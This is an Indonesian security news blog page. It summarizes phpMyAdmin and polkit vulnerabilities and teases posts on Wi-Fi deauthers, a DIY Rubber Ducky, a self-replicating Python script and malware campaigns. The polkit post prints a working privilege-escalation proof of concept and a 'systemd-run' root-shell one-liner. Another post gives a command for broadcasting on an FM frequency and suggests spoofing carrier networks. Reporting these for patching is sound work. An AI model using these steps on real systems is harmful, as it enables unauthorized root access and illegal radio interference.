Yuks Upgrade phpMyAdmin sekarang! Ada 3 Bug Berbahaya

Tim pengembang phpMyAdmin kembali mengumumkan rilis terbaru dari aplikasi manajemen database milik mereka, phpMyAdmin. Versi yang dirilis adalah versi 4.8.4 yang merangkum sejumlah perbaikan terhadap 3 bug berbahaya (critical vulnerabilities).

Tiga bug berbahaya yang merupakan critical vulnerabilities ini antara lain:

Local file inclusion

salah satu komponen dari phpMyAdmin bisa dimanfaatkan hacker untuk membaca dan menampilkan file apapun dari server. Hacker terlebih dulu harus menguasai akses ke konfigurasi Storage phpMyAdmin untuk dapat melakukan serangan ini.

Lebih lengkap baca disini https://www.phpmyadmin.net/security/PMASA-2018-6/

XSRF/CSRF

Untuk kesekian kali phpMyAdmin terkena bug Cross-site Request Forgery, dimana hacker dengan cara memanipulasi URL phpMyAdmin tertentu, bisa dengan sangat mudah me-rename database, membuat tabel atau routin SQL baru, menghapus halaman designer, menambahkan atau menghapus user, mengupdate password user tertentu dan mematikan SQL server!

Sangat bahaya. Silakan baca lebih lanjut disini https://www.phpmyadmin.net/security/PMASA-2018-7/

XSS di menu Navigasi

Yang terakhir Cross-site Scripting yang menimpa salah satu komponen di menu Navigasi (database dan tabel). Dimana dengan kemampuan khusus, hacker bisa menambahkan script Javascript tambahan ke browser pengguna.

Javascript tambahan ini tidak terbatasi besar dan efek payload nya. Lebih lengkap silakan baca https://www.phpmyadmin.net/security/PMASA-2018-8/

Update Sekarang!

Tidak ada jalan lain gan, silakan update sekarang. Dari berapapun versinya, silakan upgrade ke versi 4.8.4. Lebih amannya, silakan hapus phpMyAdmin dan download source terbaru mereka dari www.phpmyadmin.net

Download phpMyAdmin versi 4.8.4 disini: https://files.phpmyadmin.net/phpMyAdmin/4.8.4/phpMyAdmin-4.8.4-all-languages.zip

Bug Konyol di Linux, user biasa bisa Jadi Setara Root!?

Anggapan bahwa Linux itu Aman, itu relatif, jangan ditelan mentah-mentah. Kini ada lagi satu bug konyol yang menimpa semua versi Linux yang beredar saat ini. Seorang user biasa bisa mengeksekusi perintah apapun, seperti halnya root!

Bug ini adalah bug di software PolicyKit (atau polkit), sebuah aplikasi low level di hampir semua sistem operasi Unix-like yang mendefinisikan kebijakan akses dan kebijakan kewenangan masing-masing user yang ada disistem. Bug ini diidentifikasi dari CVE nomor 2018-19788. CVE-2018-19788 ini menimpa PolicyKit versi 0.115 yang dipakai disemua distro linux seperti Red Hat dan turunannya, Debian dan turunannya.

Apa Sih Bug Yang Ditemukan?

Ternyata gan, jika sebuah user diberi UID (user ID) yang nilainya lebih dari maksimum nilai sebuah integer di Linux (INT_MAX), maka dia bisa mengeksekusi perintah apapun di Linux. INT_MAX disini kira-kira sekitar 2147483647 atau 0x7FFFFFFF dalam bilangan Heksa.

Jika UID dari user itu lebih dari angka 2147483647, user tersebut akan punya kewenangan yang tidak terbatas karena PolicyKit gagal mengantisipasi kejadian seperti itu.

Seperti yang dijelaskan oleh om 0xm1rch dalam Proof of Conceptnya, dalam exploit yang dia bikin, dia sukses membuat sebuah user dengan UID 4000000000 bisa mengeksekusi apapun. 😀

#!/bin/bash
# PoC for CVE-2018-19788
# Rich Mirch

cat >woot.service<<EOF
[Unit]
Description=Woot
[Service]
Type=notify
ExecStart=/bin/bash -c "echo woot \$(id)|wall"
KillMode=process
Restart=on-failure
RestartSec=42s
[Install]
WantedBy=multi-user.target
EOF

systemctl link $PWD/woot.service
systemctl start woot

# @paragonsec discovered a much cleaner method to get root. Use this instead
# https://twitter.com/paragonsec/status/1071152249529884674
# systemd-run -t /bin/bash

Solusi?

Upgrade lah gan. emang mau ngapain lagi. 

ESP8266 Wi-Fi Deauther 2.0 dirilis, Apa saja fitur barunya?





Spacehuhn baru saja mengumumkan rilis dari ESP8266 Wi-Fi Deauther versi 2.0 gan. Setelah cukup lama versi 1.6 beredar luas, versi terbaru pun hadir. Versi 2.0 ini benar-benar ditulis ulang dari awal sehingga diklaim oleh om Spacehuhn jadi lebih cepat dan reliable.

Selain itu, board official dari Wi-Fi Deauther 2.0 ini pun mengalami banyak pengembangan baru.

Apa saja fitur atau pengembangan baru di versi 2.0 ini? Continue reading ESP8266 Wi-Fi Deauther 2.0 dirilis, Apa saja fitur barunya?



Apa itu RuntimeBroker.exe dan Cara Mengatasinya





Bagi yang memakai Windows 10 di komputer yang pas-pasan seperti hamba yang kismin ini, akan gatal saat melihat Task Manager dan mendapati aplikasi bawaan Microsoft sedang gila-gilaan memakan RAM dan CPU Usage. Salah satunya RuntimeBroker.exe dan SVChost.exe.

Apa itu RuntimeBroker.exe?

Runtimebroker.exe adalah aplikasi buatan Microsoft untuk Windows 10 yang tugasnya mengatur permission aplikasi yang di download dari Microsoft Store. Jadi runtimebroker ini memastikan aplikasi yang ada di komputer kita itu bener-bener bikinan mereka, misalkan Mic, Jam, Webcam dll asli aplikasi exe mereka bukan virus atau file lain yang di-rename jadi .exe.

Saat idle/tidak sedang ngapa-ngapain, aplikasi ini tidak mengonsumsi RAM dan CPU terlalu berarti, cenderung 0%. Tapi saat sibuk ngecek permission, dia bisa rakus habisin 15% RAM/CPU.

RuntimeBroker via Fossbyte dot com

Untuk mengatasinya dengan sementara, bisa di klik kanan, pilih End Task saja. Continue reading Apa itu RuntimeBroker.exe dan Cara Mengatasinya



Ikut Kuis Facebook ‘NameTest’? Selamat Data-data Kamu Dihack/Dijual! (Bersama 120 Juta orang lain)





Lagi, Facebook kembali diterpa isu miring soal penjualan data personal penggunanya tanpa izin. Setelah heboh Cambridge Analytica di Amerika dan akhirnya berkembang ke seluruh dunia terkait Pilpres disana, kini Facebook Quiz ‘NameTest’ bikin heboh. Lebih dari 120 Juta data pengguna facebook dijual.

Adalah om Inti De Ceukerlaire, yang mengungkap skandal dari aplikasi kui facebook ini di halaman Medium miliknya. Ironisnya, skandal aplikasi ini sudah di ketahui Facebook bersama dengan aplikasi bermasalah lainnya di bagian Facebook Data Abuse Bounty program. Hmmm, Continue reading Ikut Kuis Facebook ‘NameTest’? Selamat Data-data Kamu Dihack/Dijual! (Bersama 120 Juta orang lain)



Skill Level Dewa, Orang Ini Hacking Jaringan Seluler dengan USB to VGA Adapter!





Pagelaran OsmoDevCon tahun ini diwarnai dengan kehebohan Via Vallen om Steve Markgraf yang mendemokan bagaimana cara melakukan spoofing Jaringan Selular GSM dengan berbekal USB to VGA! Ya gan, bukan guyon ini, alat yang digunakan memang hanya USB to VGA Adapter.

Gelaran OsmoDevCon yang berlangsung dari tanggal 20 sampai 23 April 2018 di Berlin, Jerman ini menghadirkan banyak pembicara dan pegiat keamanan. Salah satunya riset tentang SDR (Software Defined Radio) terbaru.

Spoofing dengan USB To VGA

Memang tidak sebarang USB to VGA Adapter bisa dipakai gan. Yang didemokan oleh om Steve Markgraf di OsmoDevCon kemarin, adalah USB to VGA Adapter dengan chipset khusus. Chipset yang dipakai pada alat itu adalah Fresco Logic FL2000.

USB to VGA Adapter ini bisa didapatkan luas, ada di Aliexpress, Amazon, Ebay dll. Belum tahu juga, apakah sudah ada yang jual di Indonesia. Namun, seharusnya sudah banyak, karena produk ini memang banyak dipasaran.

Begini penampakannya:

Dengan harga hanya 5 dolar amerika (atau sekitar 80 ribuan). Meskipun demikian, harga alat 5 dolar ini bisa memancarkan sinyal low-power FM, DAB, DVB-T, GSM, UMTS dan GPS!

Untuk demo pada saat itu, om Steve mempraktikkan bagaimana dia membuat sebuah Jaringan Selular GSM baru dengan nama Test PLMN 1-1.

Nama jaringan itu bersanding dengan nama operator seluler lainnya di Jerman, Telekom dan Vodafone.

Selain itu dia juga mendemokan pemancaran sinyal radio FM dengan sebaris perintah di Linux. Software yang digunakan juga open source, GNU Radio.

Contohnya, memancarkan suara musik mono WBFM di frekuensi 95 MHz (hehe, ganggu stasiun radio ini mah) :

pacat -r -d alsa_output.pci-0000_00_1b.0.analog-stereo.monitor | \
pv -B 256k | \
sox -t raw -r 44100 -e signed-integer -L -b 16 -c 2 - -c 1 -e signed-integer -b 16 -t raw - \
biquad 4.76963 -2.98129 0 1 0.78833 0 sinc -15k loudness 5 | \
fl2k_fm - -s 130e6 -c 35e6 -i 44100

Untuk contoh dan software-softwarenya, bisa didapat di repo Github om Steve disini: https://github.com/steve-m/fl2k-examples

Atau bagi yang penasaran, silakan baca wiki dari osmo-fl2k disini: https://osmocom.org/projects/osmo-fl2k/wiki

atau Slide Presentasinya disini: http://people.osmocom.org/steve-m/fl2k_slides/osmo-fl2k.html atau Videonya disini: http://media.ccc.de/

Sudah kebayang kejailan yang bisa diakibatkan alat ini? Kalian bisa imitasi jaringan Telomsel, Inbosat atau lainnya, atau mengganggu sinyal GPS. Atau menjaili sinyal radio FM.



Waspada, Beredar Virus Android Yang Bisa Curi Percakapan FB, WeChat, Line dll





Perangkat android kembali jadi target serangan malware secara serius. Kali ini firma keamanan Trustlook mengungkapkan temuannya lewat blog mereka tentang penemuan aplikasi Cloud Module.

Apa bahayanya? menurut Trustlook, aplikasi malware ini akan mencuri data percakapan aplikasi messaging seperti Facebook Messenger, Skype, Telegram, Twitter, Viber dan lainnya. Cloud Module Boxa ini bahkan bisa memodifikasi file recovery Android /system/etc/install-recovery.sh yang di eksekusi tiap hape booting. Jadi, pencurian data yang mereka lakukan, bisa dilakukan meskipun hape sudah direstart!

Penyebaran

Menurut Trustlook, aplikasi Cloud Module Boxa (com.android.boxa) ini terinfeksi di sekitar China. Sampai saat ini belum terdeteksi ada di Google Play Store di negara manapun. Masih menurut Trustlook, sepertinya pembuat malware ini menargetkan para pembuat hape OEM di negara China atau pegiat dunia ROM. Continue reading Waspada, Beredar Virus Android Yang Bisa Curi Percakapan FB, WeChat, Line dll



Awas Pengguna TeamViewer, Ada Bug yang Bisa Bikin Komputermu Kena Hack





Pernah atau sedang menggunakan TeamViewer sebagai layanan ke Client? Hati-hati. Siap-siap update ke software terbaru. Ada bug cukup serius yang memungkinkan hacker untuk mengendalikan balik komputer yang tersambung via teamviewer.

Adalah om Gellin seorang pengguna Github yang mengungkapkan vulnerability ini ke publik. Sebuah proof of concept yang ditulisnya lewat Github disini, sudah di fork lebih dari 25 kali.

Continue reading Awas Pengguna TeamViewer, Ada Bug yang Bisa Bikin Komputermu Kena Hack



Yang Baru di Kali Linux 2017.2, Banyak Tool Baru





Sejak tahun 2016, Kali Linux sudah jadi Rolling Release distro. Nah, edisi kedua ini, 2017.2 menghadirkan banyak tool hacking dan pentest baru. Apa saja?

Selain memperbarui aplikasi dan library di Kali Linux, tim pengembang distro pentest terpopuler ini juga melakukan sinkronisasi penggunaan Help untuk pengguna pemula dan pengguna lawas. Dan, untuk tool baru yang disematkan di Kali Linux 2017.2 ini adalah: Continue reading Yang Baru di Kali Linux 2017.2, Banyak Tool Baru



Cara Membuat USB Rubber Ducky Sendiri!





Kalian yang nonton dan mengikuti channel Youtube Hak5, pasti tahu produk mereka USB Rubber Ducky. Sebuah tool pentesting yang mengeksploitasi port USB komputer, multiplatform baik Windows, Linux maupun Mac OS X. Alat serupa USB flashdisk biasa ini bekerja seperti layaknya keyboard USB yang langsung mengetikkan script yang kita bikin.

Harga USB Rubber Ducky ini cukup mahal, 44,99 US Dollar atau sekitar 600 ribuan. Ada alternatif lain sebenarnya, kita bikin USB Rubber Ducky sendiri. Yang dibutuhkan cuma Arduino dan sedikit kemampuan memahami Ducky Script (script yang khusus di buat untuk USB Rubber Ducky). Continue reading Cara Membuat USB Rubber Ducky Sendiri!



Jual Wifi ‘Jammer’ / Deauther SNAFU





SNAFU adalah Wifi ‘Jammer’ dan Deauther tool yang digunakan untuk kepentingan pentesting/computer security. SNAFU adalah produk dari SistemInformasi.biz yang dibuat dari board ESP8266 dan menggunakan firmware ESP8266 Deauther dari Spacehuhn (Steven Kremser).

Jammer disini bukan mengacaukan atau mematikan sama sekali frekuensi radio Wi-Fi, tapi lebih kepada mengacaukan akses dan kemampuan Access Point Wi-Fi untuk bisa digunakan. Continue reading Jual Wifi ‘Jammer’ / Deauther SNAFU



Cara Membuat Script Python yang Mampu Self-Replicate (Mirip Worm)





Python diakui atau tidak adalah salah satu scripting language yang paling banyak digunakan sebagai bahasa pemrograman tool hacking dan backdoor dalam dunia Computer Security. Dalam tutorial singkat ini, kita akan membuat script python yang bisa mereplika dirinya sendiri, seperti layaknya Worm.

Source code dibawah ini sangat simple dan bisa diimplementasikan ke hampir semua backdoor yang kalian temui atau tulis sendiri. Tinggal taruh di modul main atau terserah kalian.

Continue reading Cara Membuat Script Python yang Mampu Self-Replicate (Mirip Worm)



TERUNGKAP! Kamu Dibohongi pakai @[4:0] di Facebook





Ya, kamu dibohongi teman-temanmu, pakai @[4:0] untuk mengecek apakah facebookmu di hack atau tidak. Jika aman, konon akan muncul nama Mark Zuckerberg. Benarkah bib?

Wkwkwk, tidak ada hubungannya kode @[4:0] dengan cek-mengecek akunmu kena hack atau tidak. Dengan menuliskan @[4:0] pasti akan muncul nama Mark Zuckerberg, karena memang demikian adanya, itu adalah FITUR MENTION di Facebook yang tidak banyak orang tahu. Continue reading TERUNGKAP! Kamu Dibohongi pakai @[4:0] di Facebook



Mengenal Webbies Toolkit, Tool untuk Web Recon & Enumeration





Web Recon atau Website Reconnaissance bisa dibagi menjadi dua jenis, recon aktif dan recon pasif.

Ciri Recon aktif membutuhkan interaksi dengan komputer target untuk mendapatkan informasi penetrasi yang dibutuhkan. Recon aktif sangat rawan terkena deteksi. Sysadmin yang diserang mungkin akan segera memblokir IP Address jika ketahuan.

Sedangkan ciri utama Recon pasif adalah tidak membutuhkan interaksi dengan komputer target. Contoh paling jelas dari metode ini adalah mendapatkan informasi seputar OS server, versi OS server, IP Address, DNS Server, dll dengan Netcraft dan tool online lain. Continue reading Mengenal Webbies Toolkit, Tool untuk Web Recon & Enumeration



Mari Membahas Content Injection Vulnerability di WordPress





Mungkin sedikit usang, tapi bagi website yang tidak selalu diupdate, bug Content Injection yang dimiliki WordPress sebelum versi 4.7.2 agaknya lumayan konyol untuk tidak dibahas.

Apa itu Content Injection?

Secara sederhana adalah proses ilegal untuk membuat atau mengupdate sebuah post di WordPress dengan memanfaatkan bug di REST API milik WordPress.  Continue reading Mari Membahas Content Injection Vulnerability di WordPress



Inilah VBScan: vBulletin Vulnerability Scanner!





Tool pentest yang satu ini tergolong cukup baru. Karena mulai diperkenalkan 3 sampai dengan 4 bulan lalu. Namanya VBScan, atau lengkapnya OWASP VBScan. Dia adalah tool scanning vulnerability CMS vBulletin (salah satu CMS forum terbesar saat ini).

VBScan ditulis dalam bahasa Perl dan dirilis opensource dari laman Githubnya disini https://github.com/rezasp/vbscan.

Continue reading Inilah VBScan: vBulletin Vulnerability Scanner!



Bug Paling Konyol untuk Aplikasi Encryption, Gara-gara Huruf ‘P’





Sebuah aplikasi keamanan yang seharusnya cukup aman, malah tertimpa bug paling konyol. Aplikasi Enkripsi Disk “CryptKeeper” yang bisa berjalan disejumlah distro Linux ini ternyata bisa dijebol dengan memasukkan key (cukup dan hanya cukup dengan mengetik) huruf p. Wkwkwk.

Continue reading Bug Paling Konyol untuk Aplikasi Encryption, Gara-gara Huruf ‘P’



Diam-diam Hacker 100 Bank Ini Manfaatkan VBScript, Google Form & Google Apps Script





Tidak ada tool yang usang, hanya teknikmu saja yang tidak berkembang. Itulah salah satu dari manifesto dunia pentest yang pernah saya dengar. Buktinya sederhana, meskipun Windows sudah sampai versi 10, Linux sudah semakin canggih, Mac OS pun demikian, namun tool-tool hacking seperti bahasa pemrograman Shell Script, Javascript, VBScript pun masih bisa berimbas besar jika digunakan dengan teknik pentest yang berevolusi menghindari blokade sana-sini dari OS dan firewall.

Contoh besarnya, dilakukan oleh Carbanak. Carbanak adalah Grup hacker kelas kakap yang melakukan perampokan jutaan dollar dari lebih 100 bank di dunia dari 30an negara tahun 2015. Tahun 2017, operasinya kembali tercium aparat dan pengamat computer security. Continue reading Diam-diam Hacker 100 Bank Ini Manfaatkan VBScript, Google Form & Google Apps Script